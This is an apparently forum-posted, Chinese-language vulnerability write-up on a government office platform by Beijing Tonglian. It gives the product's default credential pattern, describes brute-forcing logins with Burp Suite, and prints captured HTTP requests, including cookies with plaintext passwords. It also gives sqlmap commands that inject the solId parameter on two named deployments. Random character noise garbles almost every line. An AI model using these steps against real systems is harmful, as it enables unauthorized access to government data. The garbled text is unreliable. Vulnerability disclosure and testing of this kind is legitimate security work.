|
0 @$ z* w& i" R" X ) `1 j6 w3 H& [ Q/ W, T4 a# T
) T' }: ]$ f2 C4 u1 ~1 Z5 L
6 h V3 V6 B4 b# s 平台简介:$ B' p6 v- I2 N1 p
+ L" Z# [5 f' i
/ ]% R6 B8 V- \9 ? 0 ^ [1 N7 F. J; t
1 N9 Z- i Q8 K0 \. X R- n) Z
5 O# }' M4 o- q+ Z- ]$ n
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! h q3 Q8 {3 t/ R; [' C9 X. h同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* ^, g1 Y8 ~# _6 b: `' ], ~7 ?同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
" S: u% S t5 ?) o; s* K' N % g0 l$ ]; A( |+ l5 i
2 A6 o# p# Z$ m9 R$ | & I G8 ^2 E9 m+ q0 S& E2 _& w# z
, o( t- Q% F: |# H6 _& V5 N
$ O, t; s [+ V6 Q" n! t
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* h/ p" z8 F$ h6 ^( h. m. c4 J
% V1 p' C; J3 ]
. B: ^7 I. y8 N . ^* s& F3 M0 a3 [& ?( |) c$ Y
/ ~$ d+ ^" C1 M2 E0 b
3 w) i; k# Y" a2 a: Q3 u# [
http://1.1.1.1:7197/cap-aco/#(案例2-)2 H ], K1 X( W
- H+ z$ G6 Y7 U5 K# E& C( d# P' o' {# }) i2 x2 w5 S- k
http://www.XXOO.com (案例1-官网网站)1 o/ T; V7 j/ {( v
1 } I% i1 ^. v7 } ]2 J3 R+ \% H6 y8 d" b$ Q
/ i& O/ ^ f8 |: e6 v - c3 X, q; c4 N' x7 ^$ a
& W' B" L5 j t# v ^- y3 S; B 漏洞详情:5 x; q% [0 `* N" e0 Y9 `1 a2 a
, Z7 U$ j$ \0 _+ P2 i) Y# ~+ r) z
/ E' j' [, A& k! B; u* C 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% {+ {- l; P: \7 O9 U . B$ t4 g/ |1 y& A% x
+ J) ?( Q" x d# x 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# |. N& e5 y9 S5 J$ L* b" Q . o/ s0 P* W" Q
2 w. Z8 X! T& P& L1 z / @6 d* i( W6 s5 n9 G: A7 Q
4 C* f- M" o" O( G) W) T
6 p; F. e. e# `6 j+ e1 Y
5 ~$ p& S5 Z2 `4 C4 w- [ # ~' ^2 j1 T# X
3 k* V! M5 K7 `* X, p
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:% o8 Z9 ?4 \: K- t& V' s" V
! r9 G) k, M& N7 d$ u1 f3 C5 _2 U3 L2 l0 B, J
1、案例1-官方网站# P9 ? C; b0 |1 O4 T `' s
, z: G$ J9 R# ~' ]' A3 o2 T& n- O6 _! n+ K( j2 i9 M# N0 m3 ~
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1+ u7 \4 C; N. r' [* p/ q/ z# v
7 w5 v! ?# L# O) } y$ s6 q# [4 C' j/ w
Host: www.XXOO.com1 n( @2 p' r3 X# V+ g5 p
# Z2 H' _7 _1 W; O
. Q) ]7 P. V3 l+ O& J6 ~1 f5 S Proxy-Connection: Keep-Alive
}' q/ P+ }* D5 Y0 ]5 Y( H3 G % J( a4 y/ N0 h
" w" U- ?( C+ f, b+ i Accept: application/json, text/javascript, */*; q=0.01 d* u/ M; L0 V( H! ]& q
5 k8 l7 M' K; k" E( p6 R7 r; g) R$ v; J: W8 E
Accept-Language: zh-CN. S0 o% I( u# k, n: R Y$ c# I
4 k% P$ `. Z% J
& N5 a/ D$ d9 U) s& c; I Content-Type: application/json
9 X# L* V% f( ?$ R9 R1 U& R
6 v1 R; e. k. p9 _' |! e7 @- L$ W& E: O( `/ n' s
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko3 i3 W n" p- u" o- p+ U
8 ^0 l3 R, |5 G' Z* E* d. a; g* P" B; _, j( b) ^
X-Requested-With: XMLHttpRequest1 k# r: ~1 z# v9 M# m
7 ~. i# c. F. B2 c p5 D
6 u) o3 _% f8 ^7 h( z+ S Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, g1 P! h8 J& ~' o7 {
3 c: a0 [1 C3 {3 Z3 ^' Y
/ c. Q* ^0 Y- A4 h* {
Accept-Encoding: gzip, deflate, sdch
" l5 J; ~3 R; F' e( v 7 [4 d* c( ^% Z% p5 E# L/ K
+ k* \1 W1 S6 _, C Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
1 {0 B0 S4 ]; n- j/ P, T
7 q& K2 `( {1 H1 Q4 q: T% b
% }9 C9 E& ~3 ^. G 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: m# K! m# \3 k) n3 K
* }$ X& x" P) H0 O. G
! B# C. y: f+ S6 Z+ s! Q3 ]3 x
$ @, T, y5 X2 M7 u0 |" x 8 n% r8 ? j( W* }6 U& U \' b
6 O O9 B$ S) Q0 e8 F. { 1 l/ u1 q0 ^, r: o
% u) m n9 R8 p0 U/ F; u' z
8 d7 ~) K# u3 z1 P1 }# M/ k" z" l* x
8 h5 Z U% a) p3 W. K( F- m
9 s0 r7 u- }% S8 |) _& h# i) Y" ^4 M7 n* n: O+ T0 P
3 v- E' ^8 i% J' d
- ? v' c" Q* R' |. j% k
( d/ a: G( o( K3 A5 o( B % _" ^* K7 v' S- c/ Z
# b7 l9 S% v% V
2 o4 i. `6 R# w' z 2、案例2-某天河云平台
7 x1 u7 b- a8 i* ]. j4 {
- R& G* ]+ O; G, ` O2 h x D. o0 s- n/ ^% \3 _7 J" f1 o0 T
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
8 @# _0 ]+ F8 C0 a0 c9 i$ Z ' u; Y, b( a9 K& V
: \; I. j$ C5 R2 J
Host: 1.1.1.:71975 D( g) P6 W8 v- B! U4 J
% B: O4 f: A3 n2 d! }9 b& {, c) N
& t" p8 j0 A" M" u; A
Accept: application/json, text/javascript, */*; q=0.01
1 V, ]& j( l l I; L, C( g1 U
4 ^- m: W/ V0 D+ U% }% D! R5 y+ [* Y X-Requested-With: XMLHttpRequest
8 x7 o: _8 W9 m1 W- s # I9 `" t3 P6 w# x0 p- T3 ^5 [
G! F3 M( G6 f. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.00 p8 B1 C j, X* N& O+ I! Y
- ^+ ]6 t- a" k: _* o* T
0 F; ?$ h8 w+ }8 t
Content-Type: application/json
* k4 F: O b% f: j/ U / M& J' V7 x* C3 N
2 K( V4 G9 S1 Q1 R
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008( `2 m( [; E" M( s, @$ P( y) }% J
7 ]& f. g5 s+ L: J, v2 D
! F+ K& J7 ?& W t# u, B( ~6 @ Accept-Language: zh-CN,zh;q=0.8$ O F( C8 ~5 ?
$ Y& b# D7 g/ D
, y; d) Z! r& A+ M4 {0 [. K% o9 N# ^ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1$ j# f) v+ h$ T9 H6 g
2 t2 O! t; |4 U9 t. V. K: y
/ H% \8 X. N" f( J) ^) Q
Connection: close- F+ \" X& M8 o" W) c
1 I! q$ z2 n X3 N/ A
1 v# p. U9 R1 Q9 v" d2 Y
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:' K; M7 w6 K. U( _8 g( |
5 E/ i& R& W5 {9 @' A& h9 f' w7 m0 e7 V
5 f$ w7 z3 q4 z7 ?5 \! ^6 p
9 m8 e4 a+ ]2 k0 N, n7 @6 @
3 }! K) ^/ C5 h9 M; g/ c
/ T3 F$ Y% G* Q' V |